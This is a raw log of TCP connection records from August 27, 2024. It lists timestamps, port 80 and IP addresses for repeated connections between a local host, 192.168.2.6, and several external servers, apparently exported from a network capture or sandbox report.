                                        Aug 27, 2024 08:42:15.821510077 CEST805119884.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:15.821618080 CEST805119884.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:15.821630001 CEST805119884.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:15.821647882 CEST805119884.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:15.821660042 CEST805119884.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:15.821671009 CEST805119884.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:15.821676970 CEST805119884.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:15.821682930 CEST805119884.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:15.821687937 CEST805119884.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:15.821706057 CEST805119884.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:15.821716070 CEST5119880192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:15.821866035 CEST5119880192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:15.821883917 CEST5119880192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:15.826347113 CEST5119880192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:15.831160069 CEST805119884.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:20.927090883 CEST5119980192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:20.931848049 CEST8051199194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:20.931984901 CEST5119980192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:20.942675114 CEST5119980192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:20.947494030 CEST8051199194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:21.627861977 CEST8051199194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:21.627893925 CEST8051199194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:21.627907038 CEST8051199194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:21.627919912 CEST8051199194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:21.627933025 CEST8051199194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:21.628007889 CEST5119980192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:21.628061056 CEST5119980192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:22.452510118 CEST5119980192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:23.470897913 CEST5120180192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:23.475786924 CEST8051201194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:23.475889921 CEST5120180192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:23.486563921 CEST5120180192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:23.491413116 CEST8051201194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:24.196062088 CEST8051201194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:24.196084023 CEST8051201194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:24.196098089 CEST8051201194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:24.196114063 CEST8051201194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:24.196130037 CEST8051201194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:24.196227074 CEST5120180192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:24.196268082 CEST5120180192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:24.999147892 CEST5120180192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:26.017819881 CEST5120280192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:26.022768974 CEST8051202194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:26.022917986 CEST5120280192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:26.033678055 CEST5120280192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:26.038597107 CEST8051202194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:26.038671970 CEST8051202194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:26.760317087 CEST8051202194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:26.760334969 CEST8051202194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:26.760345936 CEST8051202194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:26.760359049 CEST8051202194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:26.760370970 CEST8051202194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:26.760478020 CEST5120280192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:26.760523081 CEST5120280192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:26.834930897 CEST8051202194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:26.834989071 CEST5120280192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:27.545984030 CEST5120280192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:28.564512968 CEST5120480192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:28.569550991 CEST8051204194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:28.569639921 CEST5120480192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:28.576951981 CEST5120480192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:28.581722975 CEST8051204194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:29.260879040 CEST8051204194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:29.260895014 CEST8051204194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:29.260910034 CEST8051204194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:29.260921955 CEST8051204194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:29.260931969 CEST8051204194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:29.260945082 CEST8051204194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:29.260955095 CEST8051204194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:29.260966063 CEST8051204194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:29.260977030 CEST8051204194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:29.260992050 CEST8051204194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:29.261096001 CEST5120480192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:29.261136055 CEST5120480192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:29.261394978 CEST8051204194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:29.261447906 CEST5120480192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:29.266021013 CEST5120480192.168.2.6194.58.112.174
                                        Aug 27, 2024 08:42:29.270868063 CEST8051204194.58.112.174192.168.2.6
                                        Aug 27, 2024 08:42:35.119014025 CEST5120580192.168.2.6119.28.49.194
                                        Aug 27, 2024 08:42:35.123929024 CEST8051205119.28.49.194192.168.2.6
                                        Aug 27, 2024 08:42:35.124017000 CEST5120580192.168.2.6119.28.49.194
                                        Aug 27, 2024 08:42:35.134093046 CEST5120580192.168.2.6119.28.49.194
                                        Aug 27, 2024 08:42:35.138936043 CEST8051205119.28.49.194192.168.2.6
                                        Aug 27, 2024 08:42:36.018942118 CEST8051205119.28.49.194192.168.2.6
                                        Aug 27, 2024 08:42:36.018959999 CEST8051205119.28.49.194192.168.2.6
                                        Aug 27, 2024 08:42:36.019010067 CEST5120580192.168.2.6119.28.49.194
                                        Aug 27, 2024 08:42:36.639765978 CEST5120580192.168.2.6119.28.49.194
                                        Aug 27, 2024 08:42:37.678622961 CEST5120680192.168.2.6119.28.49.194
                                        Aug 27, 2024 08:42:37.683481932 CEST8051206119.28.49.194192.168.2.6
                                        Aug 27, 2024 08:42:37.683602095 CEST5120680192.168.2.6119.28.49.194
                                        Aug 27, 2024 08:42:37.708352089 CEST5120680192.168.2.6119.28.49.194
                                        Aug 27, 2024 08:42:37.713303089 CEST8051206119.28.49.194192.168.2.6
                                        Aug 27, 2024 08:42:38.569730997 CEST8051206119.28.49.194192.168.2.6
                                        Aug 27, 2024 08:42:38.569751978 CEST8051206119.28.49.194192.168.2.6
                                        Aug 27, 2024 08:42:38.569833994 CEST5120680192.168.2.6119.28.49.194
                                        Aug 27, 2024 08:42:39.217825890 CEST5120680192.168.2.6119.28.49.194
                                        Aug 27, 2024 08:42:40.236648083 CEST5120780192.168.2.6119.28.49.194
                                        Aug 27, 2024 08:42:40.241664886 CEST8051207119.28.49.194192.168.2.6
                                        Aug 27, 2024 08:42:40.241811991 CEST5120780192.168.2.6119.28.49.194
                                        Aug 27, 2024 08:42:40.252702951 CEST5120780192.168.2.6119.28.49.194
                                        Aug 27, 2024 08:42:40.257725000 CEST8051207119.28.49.194192.168.2.6
                                        Aug 27, 2024 08:42:40.257747889 CEST8051207119.28.49.194192.168.2.6
                                        Aug 27, 2024 08:42:41.157800913 CEST8051207119.28.49.194192.168.2.6
                                        Aug 27, 2024 08:42:41.157866001 CEST8051207119.28.49.194192.168.2.6
                                        Aug 27, 2024 08:42:41.157921076 CEST5120780192.168.2.6119.28.49.194
                                        Aug 27, 2024 08:42:41.764641047 CEST5120780192.168.2.6119.28.49.194
                                        Aug 27, 2024 08:42:42.783185959 CEST5120880192.168.2.6119.28.49.194
                                        Aug 27, 2024 08:42:42.788002014 CEST8051208119.28.49.194192.168.2.6
                                        Aug 27, 2024 08:42:42.788099051 CEST5120880192.168.2.6119.28.49.194
                                        Aug 27, 2024 08:42:42.794981003 CEST5120880192.168.2.6119.28.49.194
                                        Aug 27, 2024 08:42:42.799756050 CEST8051208119.28.49.194192.168.2.6
                                        Aug 27, 2024 08:42:43.687777996 CEST8051208119.28.49.194192.168.2.6
                                        Aug 27, 2024 08:42:43.687792063 CEST8051208119.28.49.194192.168.2.6
                                        Aug 27, 2024 08:42:43.687957048 CEST5120880192.168.2.6119.28.49.194
                                        Aug 27, 2024 08:42:43.690684080 CEST5120880192.168.2.6119.28.49.194
                                        Aug 27, 2024 08:42:43.695560932 CEST8051208119.28.49.194192.168.2.6
                                        Aug 27, 2024 08:42:48.809478045 CEST5120980192.168.2.685.159.66.93
                                        Aug 27, 2024 08:42:48.814403057 CEST805120985.159.66.93192.168.2.6
                                        Aug 27, 2024 08:42:48.814481974 CEST5120980192.168.2.685.159.66.93
                                        Aug 27, 2024 08:42:48.836947918 CEST5120980192.168.2.685.159.66.93
                                        Aug 27, 2024 08:42:48.841906071 CEST805120985.159.66.93192.168.2.6
                                        Aug 27, 2024 08:42:49.519751072 CEST805120985.159.66.93192.168.2.6
                                        Aug 27, 2024 08:42:49.519778013 CEST805120985.159.66.93192.168.2.6
                                        Aug 27, 2024 08:42:49.521661997 CEST5120980192.168.2.685.159.66.93
                                        Aug 27, 2024 08:42:50.342765093 CEST5120980192.168.2.685.159.66.93
                                        Aug 27, 2024 08:42:51.361547947 CEST5121080192.168.2.685.159.66.93
                                        Aug 27, 2024 08:42:51.366491079 CEST805121085.159.66.93192.168.2.6
                                        Aug 27, 2024 08:42:51.366599083 CEST5121080192.168.2.685.159.66.93
                                        Aug 27, 2024 08:42:51.377645969 CEST5121080192.168.2.685.159.66.93
                                        Aug 27, 2024 08:42:51.382591963 CEST805121085.159.66.93192.168.2.6
                                        Aug 27, 2024 08:42:52.052587986 CEST805121085.159.66.93192.168.2.6
                                        Aug 27, 2024 08:42:52.052612066 CEST805121085.159.66.93192.168.2.6
                                        Aug 27, 2024 08:42:52.052772045 CEST5121080192.168.2.685.159.66.93
                                        Aug 27, 2024 08:42:52.889722109 CEST5121080192.168.2.685.159.66.93
                                        Aug 27, 2024 08:42:53.911631107 CEST5121180192.168.2.685.159.66.93
                                        Aug 27, 2024 08:42:53.916524887 CEST805121185.159.66.93192.168.2.6
                                        Aug 27, 2024 08:42:53.919768095 CEST5121180192.168.2.685.159.66.93
                                        Aug 27, 2024 08:42:53.931512117 CEST5121180192.168.2.685.159.66.93
                                        Aug 27, 2024 08:42:53.936456919 CEST805121185.159.66.93192.168.2.6
                                        Aug 27, 2024 08:42:53.936461926 CEST805121185.159.66.93192.168.2.6
                                        Aug 27, 2024 08:42:54.625991106 CEST805121185.159.66.93192.168.2.6
                                        Aug 27, 2024 08:42:54.626034021 CEST805121185.159.66.93192.168.2.6
                                        Aug 27, 2024 08:42:54.626100063 CEST5121180192.168.2.685.159.66.93
                                        Aug 27, 2024 08:42:55.436713934 CEST5121180192.168.2.685.159.66.93
                                        Aug 27, 2024 08:42:56.455777884 CEST5121280192.168.2.685.159.66.93
                                        Aug 27, 2024 08:42:56.460695028 CEST805121285.159.66.93192.168.2.6
                                        Aug 27, 2024 08:42:56.460767031 CEST5121280192.168.2.685.159.66.93
                                        Aug 27, 2024 08:42:56.469331980 CEST5121280192.168.2.685.159.66.93
                                        Aug 27, 2024 08:42:56.474265099 CEST805121285.159.66.93192.168.2.6
                                        Aug 27, 2024 08:42:57.182338953 CEST805121285.159.66.93192.168.2.6
                                        Aug 27, 2024 08:42:57.182895899 CEST805121285.159.66.93192.168.2.6
                                        Aug 27, 2024 08:42:57.183105946 CEST5121280192.168.2.685.159.66.93
                                        Aug 27, 2024 08:42:57.185688972 CEST5121280192.168.2.685.159.66.93
                                        Aug 27, 2024 08:42:57.190529108 CEST805121285.159.66.93192.168.2.6
                                        Aug 27, 2024 08:43:02.211563110 CEST5121380192.168.2.63.33.130.190
                                        Aug 27, 2024 08:43:02.216505051 CEST80512133.33.130.190192.168.2.6
                                        Aug 27, 2024 08:43:02.216574907 CEST5121380192.168.2.63.33.130.190
                                        Aug 27, 2024 08:43:02.228945017 CEST5121380192.168.2.63.33.130.190
                                        Aug 27, 2024 08:43:02.233793020 CEST80512133.33.130.190192.168.2.6
                                        Aug 27, 2024 08:43:02.684942007 CEST80512133.33.130.190192.168.2.6
                                        Aug 27, 2024 08:43:02.685065985 CEST5121380192.168.2.63.33.130.190
                                        Aug 27, 2024 08:43:03.733736992 CEST5121380192.168.2.63.33.130.190
                                        Aug 27, 2024 08:43:03.741178036 CEST80512133.33.130.190192.168.2.6
                                        Aug 27, 2024 08:43:04.754798889 CEST5121480192.168.2.63.33.130.190
                                        Aug 27, 2024 08:43:04.759677887 CEST80512143.33.130.190192.168.2.6
                                        Aug 27, 2024 08:43:04.759753942 CEST5121480192.168.2.63.33.130.190
                                        Aug 27, 2024 08:43:04.776777029 CEST5121480192.168.2.63.33.130.190
                                        Aug 27, 2024 08:43:04.781706095 CEST80512143.33.130.190192.168.2.6
                                        Aug 27, 2024 08:43:06.164791107 CEST80512143.33.130.190192.168.2.6
                                        Aug 27, 2024 08:43:06.164860010 CEST5121480192.168.2.63.33.130.190
                                        Aug 27, 2024 08:43:06.280374050 CEST5121480192.168.2.63.33.130.190
                                        Aug 27, 2024 08:43:06.285367966 CEST80512143.33.130.190192.168.2.6
                                        Aug 27, 2024 08:43:07.299937963 CEST5121580192.168.2.63.33.130.190
                                        Aug 27, 2024 08:43:07.304733992 CEST80512153.33.130.190192.168.2.6
                                        Aug 27, 2024 08:43:07.304883957 CEST5121580192.168.2.63.33.130.190
                                        Aug 27, 2024 08:43:07.316279888 CEST5121580192.168.2.63.33.130.190
                                        Aug 27, 2024 08:43:07.321207047 CEST80512153.33.130.190192.168.2.6
                                        Aug 27, 2024 08:43:07.321244001 CEST80512153.33.130.190192.168.2.6
                                        Aug 27, 2024 08:43:08.827239990 CEST5121580192.168.2.63.33.130.190
                                        Aug 27, 2024 08:43:08.832532883 CEST80512153.33.130.190192.168.2.6
                                        Aug 27, 2024 08:43:08.832596064 CEST5121580192.168.2.63.33.130.190
                                        Aug 27, 2024 08:43:09.845882893 CEST5121780192.168.2.63.33.130.190
                                        Aug 27, 2024 08:43:09.850923061 CEST80512173.33.130.190192.168.2.6
                                        Aug 27, 2024 08:43:09.852628946 CEST5121780192.168.2.63.33.130.190
                                        Aug 27, 2024 08:43:09.860126019 CEST5121780192.168.2.63.33.130.190
                                        Aug 27, 2024 08:43:09.865032911 CEST80512173.33.130.190192.168.2.6
                                        Aug 27, 2024 08:43:11.243931055 CEST80512173.33.130.190192.168.2.6
                                        Aug 27, 2024 08:43:11.243948936 CEST80512173.33.130.190192.168.2.6
                                        Aug 27, 2024 08:43:11.244131088 CEST5121780192.168.2.63.33.130.190
                                        Aug 27, 2024 08:43:11.249476910 CEST5121780192.168.2.63.33.130.190
                                        Aug 27, 2024 08:43:11.254300117 CEST80512173.33.130.190192.168.2.6
                                        Aug 27, 2024 08:43:16.395216942 CEST5121880192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:16.400129080 CEST8051218194.195.220.41192.168.2.6
                                        Aug 27, 2024 08:43:16.400194883 CEST5121880192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:16.415420055 CEST5121880192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:16.420327902 CEST8051218194.195.220.41192.168.2.6
                                        Aug 27, 2024 08:43:16.912897110 CEST8051218194.195.220.41192.168.2.6
                                        Aug 27, 2024 08:43:16.913032055 CEST8051218194.195.220.41192.168.2.6
                                        Aug 27, 2024 08:43:16.913156033 CEST5121880192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:17.921500921 CEST5121880192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:18.939642906 CEST5121980192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:18.944720030 CEST8051219194.195.220.41192.168.2.6
                                        Aug 27, 2024 08:43:18.944833040 CEST5121980192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:18.955545902 CEST5121980192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:18.960426092 CEST8051219194.195.220.41192.168.2.6
                                        Aug 27, 2024 08:43:19.474562883 CEST8051219194.195.220.41192.168.2.6
                                        Aug 27, 2024 08:43:19.474586010 CEST8051219194.195.220.41192.168.2.6
                                        Aug 27, 2024 08:43:19.474679947 CEST5121980192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:20.467794895 CEST5121980192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:21.487251043 CEST5122080192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:21.492307901 CEST8051220194.195.220.41192.168.2.6
                                        Aug 27, 2024 08:43:21.492443085 CEST5122080192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:21.507898092 CEST5122080192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:21.512857914 CEST8051220194.195.220.41192.168.2.6
                                        Aug 27, 2024 08:43:21.512969017 CEST8051220194.195.220.41192.168.2.6
                                        Aug 27, 2024 08:43:22.022088051 CEST8051220194.195.220.41192.168.2.6
                                        Aug 27, 2024 08:43:22.022281885 CEST8051220194.195.220.41192.168.2.6
                                        Aug 27, 2024 08:43:22.022425890 CEST5122080192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:23.014810085 CEST5122080192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:24.037518024 CEST5122180192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:24.042732000 CEST8051221194.195.220.41192.168.2.6
                                        Aug 27, 2024 08:43:24.045592070 CEST5122180192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:24.052992105 CEST5122180192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:24.057930946 CEST8051221194.195.220.41192.168.2.6
                                        Aug 27, 2024 08:43:24.580380917 CEST8051221194.195.220.41192.168.2.6
                                        Aug 27, 2024 08:43:24.580403090 CEST8051221194.195.220.41192.168.2.6
                                        Aug 27, 2024 08:43:24.580435991 CEST8051221194.195.220.41192.168.2.6
                                        Aug 27, 2024 08:43:24.580528021 CEST5122180192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:24.580585957 CEST5122180192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:24.583899975 CEST5122180192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:24.839492083 CEST8051221194.195.220.41192.168.2.6
                                        Aug 27, 2024 08:43:29.874929905 CEST5122280192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:29.879805088 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:29.883645058 CEST5122280192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:29.895638943 CEST5122280192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:29.900574923 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.551156998 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.551182985 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.551193953 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.551208019 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.551222086 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.551234007 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.551246881 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.551259041 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.551259995 CEST5122280192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:30.551273108 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.551286936 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.551295996 CEST5122280192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:30.551317930 CEST5122280192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:30.551341057 CEST5122280192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:30.556143999 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.556210041 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.556252003 CEST5122280192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:31.405500889 CEST5122280192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:32.425009012 CEST5122380192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:32.430136919 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:32.430226088 CEST5122380192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:32.443896055 CEST5122380192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:32.448775053 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118436098 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118458033 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118477106 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118489981 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118503094 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118516922 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118521929 CEST5122380192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:33.118530035 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118545055 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118556976 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118571997 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118571043 CEST5122380192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:33.118571043 CEST5122380192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:33.118590117 CEST5122380192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:33.118642092 CEST5122380192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:33.123440027 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.123452902 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.123512983 CEST5122380192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:33.953484058 CEST5122380192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:34.971230030 CEST5122480192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:34.976145983 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:34.976243973 CEST5122480192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:34.988114119 CEST5122480192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:34.993117094 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:34.993129969 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.762628078 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.762651920 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.762665033 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.762676954 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.762691021 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.762703896 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.762715101 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.762727022 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.762741089 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.762753963 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.764513969 CEST5122480192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:35.764513969 CEST5122480192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:35.769493103 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.769507885 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.769520998 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.770241022 CEST5122480192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:35.770241022 CEST5122480192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:36.499103069 CEST5122480192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:37.521502018 CEST5122580192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:37.526391983 CEST8051225172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:37.527328968 CEST5122580192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:37.534739017 CEST5122580192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:37.539720058 CEST8051225172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:38.192948103 CEST8051225172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:38.193301916 CEST8051225172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:38.193353891 CEST5122580192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:38.196149111 CEST5122580192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:38.200934887 CEST8051225172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:43.426985979 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:43.433542013 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:43.437700987 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:43.448261976 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:43.453192949 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.030395031 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.030441046 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.030457020 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.030468941 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.030484915 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.030498981 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.030510902 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.030519009 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.030522108 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:44.030565977 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:44.030565977 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:44.036318064 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.036379099 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.036401033 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.036416054 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.036427975 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.036463022 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:44.077183962 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:44.118832111 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.118850946 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.118885994 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.118968010 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:44.119224072 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.119364977 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:44.952374935 CEST5122680192.168.2.6162.0.239.141
